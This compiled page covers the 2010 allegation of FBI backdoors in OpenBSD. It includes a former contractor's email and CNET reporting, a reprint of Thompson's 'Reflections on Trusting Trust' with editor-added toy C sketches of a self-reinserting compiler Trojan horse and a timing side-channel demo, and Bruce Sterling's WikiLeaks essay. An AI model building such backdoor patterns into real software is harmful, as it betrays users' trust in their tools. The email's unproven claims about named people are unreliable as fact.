That’s what OpenBSD’s de Raadt did Tuesday after a former government contractor named Gregory Perry came forward and told him that the FBI had put a number of back doors in OpenBSD’s IPsec stack, used by VPNs to do cryptographically secure communications over the Internet.

The allegations could make many people think twice about the security of OpenBSD, but the way de Raadt handled the matter will probably have the opposite effect — giving them another reason to trust the software.

Here’s what de Raadt said:

I refuse to become part of such a conspiracy, and
will not be talking to Gregory Perry about this.  Therefore I am
making it public so that
(a) those who use the code can audit it for these problems,
(b) those that are angry at the story can take other actions,
(c) if it is not true, those who are being accused can defend themselves.

I contacted Perry about his email, and while I couldn’t get him on the telephone, he confirmed that his letter to de Raadt was published without his consent. He gave a few more details on his involvement with the FBI (which, by the way, has no immediate comment on this).

Hello Robert,

I did not really intend for Theo to cross post that message to the rest of the Internet, but I stand by my original email message to him in those regards.

The OCF was a target for side channel key leaking mechanisms, as well as pf (the stateful inspection packet filter), in addition to the gigabit Ethernet driver stack for the OpenBSD operating system; all of those projects NETSEC donated engineers and equipment for, including the first revision of the OCF hardware acceleration framework based on the HiFN line of crypto accelerators.

The project involved was the GSA Technical Support Center, a circa 1999 joint research and development project between the FBI and the NSA; the technologies we developed were Multi Level Security controls for case collaboration between the NSA and the FBI due to the Posse Comitatus Act, although in reality those controls were only there for show as the intended facility did in fact host both FBI and NSA in the same building.

We were tasked with proposing various methods used to reverse engineer smart card technologies, including Piranha techniques for stripping organic materials from smart cards and other embedded systems used for key material storage, so that the gates could be analyzed with Scanning Electron and Scanning Tunneling Microscopy.  We also developed proposals for distributed brute force key cracking systems used for DES/3DES cryptanalysis, in addition to other methods for side channel leaking and covert backdoors in firmware-based systems.  Some of these projects were spun off into other sub projects, JTAG analysis components etc.  I left NETSEC in 2000 to start another venture, I had some fairly significant concerns with many aspects of these projects, and I was the lead architect for the site-to-site VPN project developed for the Executive Office for United States Attorneys, which was a statically keyed VPN system used at 235+ US Attorney locations and which later proved to have been backdoored by the FBI so that they could recover (potentially) grand jury information from various US Attorney sites across the United States and abroad.  The person I reported to at EOUSA was Zal Azmi, who was later appointed to Chief Information Officer of the FBI by George W. Bush, and who was chosen to lead portions of the EOUSA VPN project based upon his previous experience with the Marines (prior to that, Zal was a mujahideen for Usama bin Laden in their fight against the Soviets; he speaks fluent Farsi and worked on various incursions with the CIA as a linguist both pre- and post-9/11, prior to his tenure at the FBI as CIO and head of the FBI’s Sentinel case management system with Lockheed).  After I left NETSEC, I ended up becoming the recipient of a FISA-sanctioned investigation, presumably so that I would not talk about those various projects; my NDA recently expired so I am free to talk about whatever I wish.

Here is one of the articles I was quoted in from the NY Times that touches on the encryption export issue:
http://www.nytimes.com/1999/10/11/business/technology-easing-on-software-exports-has-limits.html?pagewanted=all

In reality, the Clinton administration was very quietly working behind the scenes to embed backdoors in many areas of technology as a counter to their supposed relaxation of the Department of Commerce encryption export regulations – and this was all pre-9/11 stuff as well, where the walls between the FBI and DoD were very well established, at least in theory.

Some people have decided that Perry’s claims are not credible, and at least one person named in his email has come forward to say it’s not true.  But at this point, it seems that nobody but Perry really knows what’s going on.

It’s hard to really know what to say at this point. We’re talking about backdoors that probably just look like regular old bugs in code that was written 10 years ago.


CNET’s Declan McCullagh spotted the following tweet from former FBI agent E.J. Hilbert:

I was one of the few FBI cyber agents when the coding supposedly happened. Experiment yes. Success No. http://myloc.me/fiubs
7:57 PM Dec 14th via ÜberTwitter from Las Flores, CA
ejhilbert
E.J. Hilbert
https://twitter.com/ejhilbert/status/14891845825863680

4 DAYS LATER:

@vze2p5 I commented to spark a discussion. Many take social media as truth rather than question & discuss. Its the former teacher in me
12:25 AM Dec 18th via TweetDeck in reply to vze2p5

https://twitter.com/ejhilbert


CNET
http://news.cnet.com/8301-31921_3-20025767-281.html

Report of FBI back door roils OpenBSD community
by Declan McCullagh, December 15, 2010 11:08 AM PST

Allegations that the FBI surreptitiously placed a back door into the OpenBSD operating system have alarmed the computer security community, prompting calls for an audit of the source code and claims that the charges must be a hoax.

The report surfaced in e-mail made public yesterday from a former government contractor, who alleged that he worked with the FBI to implement “a number of back doors” in OpenBSD, which has a reputation for high security and is used in some commercial products.

Gregory Perry, the former chief technologist at the now-defunct contractor Network Security Technology, or NETSEC, said he’s disclosing this information now because his 10-year confidentiality agreement with the FBI has expired. The e-mail was sent to OpenBSD founder Theo de Raadt, who posted it publicly.

“I cashed out of the company shortly after the FBI project,” Perry told CNET today. “At that time there were significant legal barriers between domestic law enforcement and [the Department of Defense], and [this project] was in clear violation of that.” He said the project was a “circa 1999 joint research and development project between the FBI and the NSA,” which is part of the Defense Department.

The OpenBSD project, which was once funded by DARPA but had its funding yanked in 2003 for unspecified reasons, says that it takes an “uncompromising view toward increased security.” The code is used in Microsoft’s Windows Services for Unix and firewalls including ones sold by Calyptix Security, Germany’s Swapspace.de, and Switzerland’s Apsis GmbH.

In national security circles, it’s an open secret that the U.S. government likes to implant back doors in encryption products.
That’s what the FBI proposed in September, although it also claimed that the crypto-back doors would be used only through a legal process. So did the Clinton administration, in what was its first technology initiative in the early 1990s, which became known as the Clipper Chip.

If implemented correctly using a strong algorithm, modern encryption tools are believed to be so secure that even the NSA’s phalanxes of supercomputers are unable to decrypt messages or stored data. One report noted that, even in the 1990s, the FBI was unable to successfully decrypt communications from some wiretaps, and a report this year said it could not decrypt hard drives using the AES algorithm with a 256-bit key.
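[Aside: back-of-envelope numbers on why brute force separates the crackable DES of the 1990s from AES-256. The attack rate is an arbitrary assumption for illustration, not a claim about any agency’s hardware:]

    /* Keyspace arithmetic: DES (56-bit) vs. AES-256, at an assumed
       rate of 10^12 keys/second. Illustrative only. */
    #include <stdio.h>
    #include <math.h>

    int main(void) {
        const double rate = 1e12;                  /* assumed keys/sec */
        const double year = 3600.0 * 24.0 * 365.0;

        double des = pow(2.0, 56.0)  / rate;       /* seconds to exhaust */
        double aes = pow(2.0, 256.0) / rate / year;

        printf("DES:     ~%.0f hours to exhaust the keyspace\n", des / 3600.0);
        printf("AES-256: ~%.1e years to exhaust the keyspace\n", aes);
        return 0;
    }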

E.J. Hilbert, a former FBI agent, indicated in a note on Twitter last night that the OpenBSD “experiment” happened but was unsuccessful.

The Justice Department did not respond to a request from CNET yesterday for comment.

NETSEC, the now-defunct contractor, boasted at the time that it was a top provider of computer security services to the Justice Department, the Treasury Department, the National Science Foundation, and unnamed intelligence agencies. A 2002 NSF document (PDF) says NETSEC was “a contractor that NSF utilizes for computer forensics” that performed an investigation of whether data “deleted from an internal NSF server” amounted to a malicious act or not.

A snapshot of the NETSEC Web page from August 2000 from Archive.org shows that the company touted its close ties with the NSA: “Building upon practices developed while employed at the National Security Agency (NSA) and Department of Defense (DoD), the methodologies utilized at NETSEC today are widely regarded as the best anywhere,” it says.

On the OpenBSD technical mailing list, reaction was concerned but skeptical. One post suggested that the best way to insert a back door would be to leak information about the cryptographic key through the network, perhaps through what’s known as a side channel attack. (A 2000 paper describes that technique as using information about the specific implementation of the algorithm to break a cipher, in much the same way that radiation from a computer monitor can leak information about what’s on the screen. Secure environments use TEMPEST shielding to block that particular side channel.)
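
{{ The “side channel” idea deserves one concrete software illustration. The sketch below is an editorial addition in C, not the network attack the mailing-list post described: a comparison routine that bails out at the first mismatching byte leaks, through its running time, how long a correct prefix of the guess is; the constant-time version leaks nothing through timing. }}

#include <stdio.h>
#include <stddef.h>

/* Leaky comparison: returns at the first mismatch, so an attacker who
   can time many calls learns how many leading bytes of the guess are
   correct -- a classic timing side channel. */
static int leaky_compare(const unsigned char *a, const unsigned char *b, size_t n)
{
    for (size_t i = 0; i < n; i++)
        if (a[i] != b[i])
            return 0;
    return 1;
}

/* Constant-time comparison: always touches every byte, so the running
   time says nothing about where the first mismatch occurred. */
static int ct_compare(const unsigned char *a, const unsigned char *b, size_t n)
{
    unsigned char diff = 0;
    for (size_t i = 0; i < n; i++)
        diff |= a[i] ^ b[i];
    return diff == 0;
}

int main(void)
{
    const unsigned char secret[] = "s3cret";
    const unsigned char guess[]  = "s3cr__";
    printf("leaky: %d  constant-time: %d\n",
           leaky_compare(secret, guess, 6), ct_compare(secret, guess, 6));
    return 0;
}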

A 1999 New York Times article written by Peter Wayner about the Clinton administration’s encryption policies, which quoted Perry about OpenBSD, noted that “the Naval Research Lab in Virginia is using OpenBSD as a foundation of its new IPv6 project.”

Perry told CNET that he hired Jason Wright “at NETSEC as a security researcher, he was basically paid to develop full time for the OpenBSD platform.” In the e-mail to de Raadt, Perry added that “Jason Wright and several other developers were responsible for those back doors, and you would be well advised to review any and all code commits by Wright as well as the other developers he worked with originating from NETSEC.”

Wright’s LinkedIn profile lists him as a “senior developer” at the OpenBSD project and a cybersecurity engineer at the Idaho National Laboratory, and previously a software engineer at NETSEC. He did not respond to a request for comment.

A decades-long push for back doors

While the OpenBSD allegations may never be fully proved or disproved, it’s clear that the federal government has a long history of pressing for back doors into products or networks for eavesdropping purposes. The Bush administration-era controversy over pressuring AT&T to open its network–in apparent violation of federal law–is a recent example.

Louis Tordella, the longest-serving deputy director of the NSA, acknowledged overseeing a similar project to intercept telegrams as recently as the 1970s. It relied on the major telegraph companies, including Western Union, secretly turning over copies of all messages sent to or from the United States.

“All of the big international carriers were involved, but none of ’em ever got a nickel for what they did,” Tordella said before his death in 1996, according to a history written by L. Britt Snider, a Senate aide who became the CIA’s inspector general.

The telegraph interception operation was called Project Shamrock. It involved a courier making daily trips from the NSA’s headquarters in Fort Meade, Md., to New York to retrieve digital copies of the telegrams on magnetic tape.

Like the eavesdropping system authorized by President Bush, Project Shamrock had a “watch list” of people in the U.S. whose conversations would be identified and plucked out of the ether by NSA computers. It was intended to be used for foreign intelligence purposes.

Then-President Richard Nixon, plagued by anti-Vietnam protests and worried about foreign influence, ordered that Project Shamrock’s electronic ear be turned inward to eavesdrop on American citizens. In 1969, Nixon met with the heads of the NSA, CIA and FBI and authorized a program to intercept “the communications of U.S. citizens using international facilities,” meaning international calls, according to James Bamford’s 2001 book titled “Body of Secrets.”

Nixon later withdrew the formal authorization, but informally, police and intelligence agencies kept adding names to the watch list. At its peak, 600 American citizens appeared on the list, including singer Joan Baez, pediatrician Benjamin Spock, actress Jane Fonda, and the Rev. Martin Luther King Jr.

Another apparent example of NSA and industry cooperation became public in 1995. The Baltimore Sun reported that for decades NSA had rigged the encryption products of Crypto AG, a Swiss firm, so U.S. eavesdroppers could easily break their codes.

The six-part story, based on interviews with former employees and company documents, said Crypto AG sold its compromised security products to some 120 countries, in

http://news.cnet.com/8301-31921_3-20025767-281.html
http://marc.info/?l=openbsd-tech&m=129236621626462&w=2
http://en.wikipedia.org/wiki/Theo_de_Raadt
http://news.cnet.com/Defense-agency-pulls-OpenBSD-funding/2100-1016_3-997393.html?tag=mncol;txt
http://www.openbsd.org/security.html
http://technet.microsoft.com/en-us/library/bb496994.aspx
http://calyptix.com/
http://www.swapspace.de/flash/index.html
http://www.apsis.ch/
http://news.cnet.com/8301-31921_3-20017671-281.html?tag=mncol;txt
http://www.dtic.mil/cgi-bin/GetTRDoc?Location=U2&doc=GetTRDoc.pdf&AD=ADA485001
http://yro.slashdot.org/story/10/06/26/1825204/FBI-Failed-To-Break-Encryption-of-Hard-Drives
https://twitter.com/ejhilbert/status/14891845825863680
http://www.nsf.gov/pubs/2002/oigseptember2001/pdffiles/investigations.pdf
http://web.archive.org/web/20000815072218/www.netsec.net/info.html
http://marc.info/?l=openbsd-tech&m=129237675106730&w=2
http://www.schneier.com/paper-side-channel2.pdf
http://en.wikipedia.org/wiki/TEMPEST
http://www.nytimes.com/1999/10/11/business/technology-easing-on-software-exports-has-limits.html?pagewanted=print
http://thought.net/jason/
http://www.linkedin.com/in/jasonwright
https://inlportal.inl.gov/portal/server.pt/community/inl_portal_support/547
http://news.cnet.com/8301-13578_3-10143520-38.html?tag=mncol;txt
http://articles.baltimoresun.com/1995-12-10/news/1995344157_1_sting-encryption-sun


FINAL REFLECTIONS
(contemplate until someone comes up with the actual FBI-compromised code)

http://cm.bell-labs.com/who/ken/trust.html

Reflections on Trusting Trust
Ken Thompson

Reprinted from Communications of the ACM, Vol. 27, No. 8, August 1984, pp. 761-763. Copyright © 1984, Association for Computing Machinery, Inc. Also appears in ACM Turing Award Lectures: The First Twenty Years 1965-1985, Copyright © 1987 by the ACM Press, and Computers Under Attack: Intruders, Worms, and Viruses, Copyright © 1990 by the ACM Press.
I copied this page from the ACM, in fear that it would someday turn stale.

Introduction

I thank the ACM for this award. I can’t help but feel that I am receiving this honor for timing and serendipity as much as technical merit. UNIX swept into popularity with an industry-wide change from central main frames to autonomous minis. I suspect that Daniel Bobrow (1) would be here instead of me if he could not afford a PDP-10 and had to “settle” for a PDP-11. Moreover, the current state of UNIX is the result of the labors of a large number of people.

There is an old adage, “Dance with the one that brought you,” which means that I should talk about UNIX. I have not worked on mainstream UNIX in many years, yet I continue to get undeserved credit for the work of others. Therefore, I am not going to talk about UNIX, but I want to thank everyone who has contributed.

That brings me to Dennis Ritchie. Our collaboration has been a thing of beauty. In the ten years that we have worked together, I can recall only one case of miscoordination of work. On that occasion, I discovered that we both had written the same 20-line assembly language program. I compared the sources and was astounded to find that they matched character-for-character. The result of our work together has been far greater than the work that we each contributed.

I am a programmer. On my 1040 form, that is what I put down as my occupation. As a programmer, I write programs. I would like to present to you the cutest program I ever wrote. I will do this in three stages and try to bring it together at the end.

Stage I

In college, before video games, we would amuse ourselves by posing programming exercises. One of the favorites was to write the shortest self-reproducing program. Since this is an exercise divorced from reality, the usual vehicle was FORTRAN. Actually, FORTRAN was the language of choice for the same reason that three-legged races are popular.

More precisely stated, the problem is to write a source program that, when compiled and executed, will produce as output an exact copy of its source. If you have never done this, I urge you to try it on your own. The discovery of how to do it is a revelation that far surpasses any benefit obtained by being told how to do it. The part about “shortest” was just an incentive to demonstrate skill and determine a winner.

FIGURE 1

Figure 1 shows a self-reproducing program in the C programming language. (The purist will note that the program is not precisely a self-reproducing program, but will produce a self-reproducing program.) This entry is much too large to win a prize, but it demonstrates the technique and has two important properties that I need to complete my story: (1) This program can be easily written by another program. (2) This program can contain an arbitrary amount of excess baggage that will be reproduced along with the main algorithm. In the example, even the comment is reproduced.
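
{{ The ACM figures did not survive this copy. In place of Figure 1, here is a minimal stand-in quine, an editorial reconstruction rather than Thompson’s original program. The comment on the first line is the “excess baggage”: it rides inside the string and is reproduced along with everything else. }}

/* A self-reproducing C program: when compiled and run, it prints its own source. */
#include <stdio.h>
const char *s = "/* A self-reproducing C program: when compiled and run, it prints its own source. */%c#include <stdio.h>%cconst char *s = %c%s%c;%cint main(void) { printf(s, 10, 10, 34, s, 34, 10, 10); return 0; }%c";
int main(void) { printf(s, 10, 10, 34, s, 34, 10, 10); return 0; }

{{ Compile it, run it, and diff the output against the source file: they match byte for byte, provided the file ends with a newline. }}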

Stage II

The C compiler is written in C. What I am about to describe is one of many “chicken and egg” problems that arise when compilers are written in their own language. In this case, I will use a specific example from the C compiler.

C allows a string construct to specify an initialized character array. The individual characters in the string can be escaped to represent unprintable characters. For example,

“Hello world\n”
represents a string with the character “\n,” representing the new line character.
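
{{ Figure 2, the compiler’s escape-sequence handler, is also missing from this copy. What follows is a minimal editorial sketch of the idea, wrapped in a runnable program; next() and unescape() are stand-in names, not the routines of any real compiler. }}

#include <stdio.h>

static const char *p;                      /* cursor into the source text */
static int next(void) { return *p++; }     /* read one source character   */

/* Return the next character of a string literal, interpreting escapes. */
static int unescape(void)
{
    int c = next();
    if (c != '\\')
        return c;            /* ordinary character                    */
    c = next();
    if (c == '\\')
        return '\\';         /* "\\" stands for a single backslash    */
    if (c == 'n')
        return '\n';         /* "\n" stands for the newline character */
    return c;                /* unrecognized escape: pass it through  */
}

int main(void)
{
    int c;
    p = "Hello world\\n";    /* source text with the escape unexpanded */
    while ((c = unescape()) != '\0')
        putchar(c);          /* prints "Hello world" and a newline     */
    return 0;
}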

FIGURE 3

Suppose we wish to alter the C compiler to include the sequence “\v” to represent the vertical tab character. The extension to Figure 2 is obvious and is presented in Figure 3. We then recompile the C compiler, but we get a diagnostic. Obviously, since the binary version of the compiler does not know about “\v,” the source is not legal C. We must “train” the compiler. After it “knows” what “\v” means, then our new change will become legal C. We look up on an ASCII chart that a vertical tab is decimal 11. We alter our source to look like Figure 4. Now the old compiler accepts the new source. We install the resulting binary as the new official C compiler and now we can write the portable version the way we had it in Figure 3.

FIGURE 4
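
{{ Figures 3 and 4 differed by a single test inside that handler. Reconstructed editorially, as lines to add to the unescape() sketch above: }}

/* Figure 3, the portable form: legal C only once a compiler binary
   already "knows" what '\v' means. */
if (c == 'v')
    return '\v';

/* Figure 4, the training form: spells out ASCII 11 so the OLD compiler
   binary can compile it. Install the result as the new compiler, and
   the Figure 3 form becomes legal C. */
if (c == 'v')
    return 11;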

This is a deep concept. It is as close to a “learning” program as I have seen. You simply tell it once, then you can use this self-referencing definition.

Stage III

FIGURE 5

Again, in the C compiler, Figure 5 represents the high-level control of the C compiler where the routine “compile” is called to compile the next line of source. Figure 6 shows a simple modification to the compiler that will deliberately miscompile source whenever a particular pattern is matched. If this were not deliberate, it would be called a compiler “bug.” Since it is deliberate, it should be called a “Trojan horse.”

FIGURE 6
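
{{ Figures 5 and 6 are missing as well. As an editorial sketch, here is a toy compile() whose “code generation” is just a printout; strstr() stands in for Thompson’s match(), and the pattern and replacement are invented for illustration. }}

#include <stdio.h>
#include <string.h>

static void emit(const char *code) { printf("emit: %s\n", code); }

/* Compile one line of source. The deliberate Trojan horse: when the
   line matches the pattern aimed at login's password check, emit a
   back door instead of what the source actually says. */
static void compile(const char *line)
{
    if (strstr(line, "checkpassword") != NULL) {
        emit("accept the real password OR a known master password");
        return;
    }
    emit(line);                              /* honest compilation */
}

int main(void)
{
    compile("x = x + 1");                    /* compiled faithfully  */
    compile("if (checkpassword(pw)) ...");   /* silently miscompiled */
    return 0;
}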

The actual bug I planted in the compiler would match code in the UNIX “login” command. The replacement code would miscompile the login command so that it would accept either the intended encrypted password or a particular known password. Thus if this code were installed in binary and the binary were used to compile the login command, I could log into that system as any user.

Such blatant code would not go undetected for long. Even the most casual perusal of the source of the C compiler would raise suspicions.

FIGURE 7

The final step is represented in Figure 7. This simply adds a second Trojan horse to the one that already exists. The second pattern is aimed at the C compiler. The replacement code is a Stage I self-reproducing program that inserts both Trojan horses into the compiler. This requires a learning phase as in the Stage II example. First we compile the modified source with the normal C compiler to produce a bugged binary. We install this binary as the official C. We can now remove the bugs from the source of the compiler and the new binary will reinsert the bugs whenever it is compiled. Of course, the login command will remain bugged with no trace in source anywhere.
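
{{ Figure 7, reconstructed editorially as a second pattern added to the toy compile() above; trojan_source is hypothetical, standing for the Stage I style self-reproducing text that carries the source of both Trojan horses. }}

/* Second Trojan horse, aimed at the compiler itself: whenever the
   compiler compiles its own compile() routine, reinsert BOTH bugs
   into the output binary, leaving no trace in any source file. */
if (strstr(line, "pattern_for_the_compile_routine") != NULL) {
    emit(trojan_source);    /* self-reproducing: contains the source
                               of both patterns and both replacements */
    return;
}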

Moral

The moral is obvious. You can’t trust code that you did not totally create yourself. (Especially code from companies that employ people like me.) No amount of source-level verification or scrutiny will protect you from using untrusted code. In demonstrating the possibility of this kind of attack, I picked on the C compiler. I could have picked on any program-handling program such as an assembler, a loader, or even hardware microcode. As the level of program gets lower, these bugs will be harder and harder to detect. A well installed microcode bug will be almost impossible to detect.

After trying to convince you that I cannot be trusted, I wish to moralize. I would like to criticize the press in its handling of the “hackers,” the 414 gang, the Dalton gang, etc. The acts performed by these kids are vandalism at best and probably trespass and theft at worst. It is only the inadequacy of the criminal code that saves the hackers from very serious prosecution. The companies that are vulnerable to this activity (and most large companies are very vulnerable) are pressing hard to update the criminal code. Unauthorized access to computer systems is already a serious crime in a few states and is currently being addressed in many more state legislatures as well as Congress.

There is an explosive situation brewing. On the one hand, the press, television, and movies make heroes of vandals by calling them whiz kids. On the other hand, the acts performed by these kids will soon be punishable by years in prison.

I have watched kids testifying before Congress. It is clear that they are completely unaware of the seriousness of their acts. There is obviously a cultural gap. The act of breaking into a computer system has to have the same social stigma as breaking into a neighbor’s house. It should not matter that the neighbor’s door is unlocked. The press must learn that misguided use of a computer is no more amazing than drunk driving of an automobile.

Acknowledgment

I first read of the possibility of such a Trojan horse in an Air Force critique (4) of the security of an early implementation of Multics.

References

1. Bobrow, D.G., Burchfiel, J.D., Murphy, D.L., and Tomlinson, R.S. TENEX, a paged time-sharing system for the PDP-10. Commun. ACM 15, 3 (Mar. 1972), 135-143.
2. Kernighan, B.W., and Ritchie, D.M. The C Programming Language. Prentice-Hall, Englewood Cliffs, N.J., 1978.
3. Ritchie, D.M., and Thompson, K. The UNIX time-sharing system. Commun. ACM 17, 7 (July 1974), 365-375.
4. Karger, P.A., and Schell, R.R. Multics Security Evaluation: Vulnerability Analysis. ESD-TR-74-193, Vol. II, June 1974, p. 52.

TRANSPARENCY (vs DISCRETION)
http://martin.hinner.info/crackdown/english/index.html
http://www.webstock.org.nz/blog/2010/the-blast-shack/
The Blast Shack
by Bruce Sterling / 22 December 2010

{{ Webstock asked Bruce Sterling, who spoke at Webstock ’09, for his take on Wikileaks. }}

The Wikileaks Cablegate scandal is the most exciting and interesting hacker scandal ever. I rather commonly write about such things, and I’m surrounded by online acquaintances who take a burning interest in every little jot and tittle of this ongoing saga. So it’s going to take me a while to explain why this highly newsworthy event fills me with such a chilly, deadening sense of Edgar Allan Poe melancholia. But it sure does. Part of this dull, icy feeling, I think, must be the agonizing slowness with which this has happened. At last — at long last — the homemade nitroglycerin in the old cypherpunks blast shack has gone off.

Those “cypherpunks,” of all people. Way back in 1992, a brainy American hacker called Timothy C. May made up a sci-fi tinged idea that he called “The Crypto Anarchist Manifesto.” This exciting screed — I read it at the time, and boy was it ever cool — was all about anonymity, and encryption, and the Internet, and all about how wacky data-obsessed subversives could get up to all kinds of globalized mischief without any fear of repercussion from the blinkered authorities. If you were of a certain technoculture bent in the early 1990s, you had to love a thing like that. As Tim blithely remarked to his fellow encryption enthusiasts, “The State will of course try to slow or halt the spread of this technology, citing national security concerns, use of the technology by drug dealers and tax evaders, and fears of societal disintegration. Many of these concerns will be valid; crypto anarchy will allow national secrets to be traded freely,” and then Tim started getting really interesting.

Later, May described an institution called “BlackNet” which might conceivably carry out these aims. Nothing much ever happened with Tim May’s imaginary BlackNet. It was the kind of out-there concept that science fiction writers like to put in novels. Because BlackNet was clever, and fun to think about, and it made impossible things seem plausible, and it was fantastic and also quite titillating. So it was the kind of farfetched but provocative issue that ought to be properly raised within a sci-fi public discourse.

Because, you know, that would allow plenty of time to contemplate the approaching trainwreck and perhaps do something practical about it. Nobody did much of anything practical. For nigh on twenty long years, nothing happened with the BlackNet notion, for good or ill. Why? Because thinking hard and eagerly about encryption involves a certain mental composition which is alien to normal public life. Crypto guys — (and the cypherpunks were all crypto guys, mostly well-educated, mathematically gifted middle-aged guys in Silicon Valley careers) — are geeks. They’re harmless geeks, they’re not radical politicians or dashing international crime figures. Cypherpunks were visionary Californians from the WIRED magazine circle. In their personal lives, they were as meek and low-key as any average code-cracking spook who works for the National Security Agency. These American spooks from Fort Meade are shy and retiring people, by their nature. In theory, the NSA could create every kind of flaming scandalous mayhem with their giant Echelon spy system — but in practice, they would much rather sit there gently reading other people’s email.


NSA, via Google Earth, 10 March 2008

One minute’s thought would reveal that a vast, opaque electronic spy outfit like the National Security Agency is exceedingly dangerous to democracy. Really, it is. The NSA clearly violates all kinds of elementary principles of constitutional design. The NSA is the very antithesis of transparency, and accountability, and free elections, and free expression, and separation of powers — in other words, the NSA is a kind of giant, grown-up, anti-Wikileaks. And it always has been. And we’re used to that. We pay no mind. The NSA, this crypto empire, is a long-lasting fact on the ground that we’ve all informally agreed not to get too concerned about. Even foreign victims of the NSA’s machinations can’t seem to get properly worked-up about its capacities and intrigues. The NSA has been around since 1947. It’s a little younger than the A-Bomb, and we don’t fuss much about that now, either. The geeks who man the NSA don’t look much like Julian Assange, because they have college degrees, shorter haircuts, better health insurance and far fewer stamps in their passports. But the sources of their power are pretty much identical to his. They use computers and they get their mitts on info that doesn’t much wanna be free. Every rare once in a while, the secretive and discreet NSA surfaces in public life and does something reprehensible, such as defeating American federal computer-security initiatives so that they can continue to eavesdrop at will. But the NSA never becomes any big flaming Wikileaks scandal. Why? Because, unlike their wannabe colleagues at Wikileaks, the apparatchiks of the NSA are not in the scandal business. They just placidly sit at the console, reading everybody’s diplomatic cables. This is their function. The NSA is an eavesdropping outfit.

Cracking the communications of other governments is its reason for being. The NSA are not unique entities in the shadows of our planet’s political landscape. Every organized government gives that a try. It’s a geopolitical fact, although it’s not too discreet to dwell on it. You can walk to most any major embassy in any major city in the world, and you can see that it is festooned with wiry heaps of electronic spying equipment. Don’t take any pictures of the roofs of embassies, as they grace our public skylines. Guards will emerge to repress you.

Now, Tim May and his imaginary BlackNet were the sci-fi extrapolation version of the NSA. A sort of inside-out, hippiefied NSA. Crypto people were always keenly aware of the NSA, for the NSA were the people who harassed them for munitions violations and struggled to suppress their academic publications. Creating a BlackNet is like having a pet, desktop NSA. Except, that instead of being a vast, federally-supported nest of supercomputers under a hill in Maryland, it’s a creaky, homemade, zero-budget social-network site for disaffected geeks.

But who cared about that wild notion? Why would that amateurish effort ever matter to real-life people? It’s like comparing a mighty IBM mainframe to some cranky Apple computer made inside a California garage. Yes, it’s almost that hard to imagine. So Wikileaks is a manifestation of something that has been growing all around us, for decades, with volcanic inexorability. The NSA is the world’s most public unknown secret agency. And for four years now, its twisted sister Wikileaks has been the world’s most blatant, most publicly praised, encrypted underground site. Wikileaks is “underground” in the way that the NSA is “covert”; not because it’s inherently obscure, but because it’s discreetly not spoken about. The NSA is “discreet,” so, somehow, people tolerate it. Wikileaks is “transparent,” like a cardboard blast shack full of kitchen-sink nitroglycerine in a vacant lot.

That is how we come to the dismal saga of Wikileaks and its ongoing Cablegate affair, which is a melancholy business, all in all. The scale of it is so big that every weirdo involved immediately becomes a larger-than-life figure. But they’re not innately heroic. They’re just living, mortal human beings, the kind of geeky, quirky, cyberculture loons that I run into every day. And man, are they ever going to pay. Now we must contemplate Bradley Manning, because he was the first to immolate himself. Private Manning was a young American, a hacker-in-uniform, bored silly while doing scarcely necessary scutwork on a military computer system in Iraq. Private Manning had dozens of reasons for becoming what computer-security professionals call the “internal threat.” His war made no sense on its face, because it was carried out in a headlong pursuit of imaginary engines of mass destruction.

The military occupation of Iraq was endless. Manning, a tender-hearted geek, was overlooked and put-upon by his superiors. Although he worked around the clock, he had nothing of any particular military consequence to do. It did not occur to his superiors that a bored soldier in a poorly secured computer system would download hundreds of thousands of diplomatic cables. Because, well, why? They’re very boring. Soldiers never read them. The malefactor has no use for them. They’re not particularly secret. They’ve got nothing much to do with his war. He knows his way around the machinery, but Bradley Manning is not any kind of blackhat programming genius. Instead, he’s very like Jérôme Kerviel, that obscure French stock trader who stole 5 billion euros without making one dime for himself.


Jérôme Kerviel, just like Bradley Manning, was a bored, resentful, lower-echelon guy in a dead end, who discovered some awesome capacities in his system that his bosses never knew it had. It makes so little sense to behave like Kerviel and Manning that their threat can’t be imagined. A weird hack like that is self-defeating, and it’s sure to bring terrible repercussions to the transgressor. But then the sad and sordid days grind on and on; and that blindly potent machinery is just sitting there. Sitting there, tempting the user. Bradley Manning believes the sci-fi legendry of the underground. He thinks that he can leak a quarter of a million secret cables, protect himself with neat-o cryptography, and, magically, never be found out.

So Manning does this, and at first he gets away with it, but, still possessed by the malaise that haunts his soul, he has to brag about his misdeed, and confess himself to a hacker confidante who immediately ships him to the authorities. No hacker story is more common than this. The ingenuity poured into the machinery is meaningless. The personal connections are treacherous. Welcome to the real world. So Private Manning, cypherpunk, is immediately toast. No army can permit this kind of behavior and remain a functional army; so Manning is in solitary confinement and he is going to be court-martialled. With more political awareness, he might have made himself a public martyr to his conscience; but he lacks political awareness. He has only his black-hat hacker awareness, which is all about committing awesome voyeuristic acts of computer intrusion and imagining you can get away with that when it really matters to people. The guy preferred his hacker identity to his sworn fidelity to the uniform of a superpower.

The shear-forces there are beyond his comprehension. The reason this upsets me is that I know so many people just like Bradley Manning. Because I used to meet and write about hackers, “crackers,” “darkside hackers,” “computer underground” types. They are a subculture, but once you get used to their many eccentricities, there is nothing particularly remote or mysterious or romantic about them. They are banal. Bradley Manning is a young, mildly brainy, unworldly American guy who probably would have been pretty much okay if he’d been left alone to skateboard, read comic books and listen to techno music. Instead, Bradley had to leak all over the third rail. Through historical circumstance, he’s become a miserable symbolic point-man for a global war on terror. He doesn’t much deserve that role. He’s got about as much to do with the political aspects of his war as Monica Lewinsky did with the lasting sexual mania that afflicts the American Republic. That is so dispiriting and ugly. As a novelist, I never think of Monica Lewinsky, that once-everyday young woman, without a sense of dread at the freakish, occult fate that overtook her. Imagine what it must be like, to wake up being her, to face the inevitability of being That Woman. Monica, too, transgressed in apparent safety and then she had the utter foolishness to brag to a lethal enemy, a trusted confidante who ran a tape machine and who brought her a mediated circus of hells. The titillation of that massive, shattering scandal has faded now. But think of the quotidian daily horror of being Monica Lewinsky, and that should take a bite from the soul. Bradley Manning now shares that exciting, oh my God, Monica Lewinsky, tortured media-freak condition. This mild little nobody has become super-famous, and in his lonely military brig, screenless and without a computer, he’s strictly confined and, no doubt, he’s horribly bored.

